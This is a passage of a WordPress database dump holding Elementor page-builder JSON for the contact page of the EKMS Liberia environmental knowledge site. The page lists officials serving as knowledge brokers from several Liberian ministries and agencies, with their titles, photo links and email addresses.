Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23261,3374,'_elementor_edit_mode','builder'),(23262,3374,'_elementor_template_type','wp-page'),(23263,3374,'_elementor_version','3.0.16'),(23264,3374,'_wp_page_template','default'),(23265,3374,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"e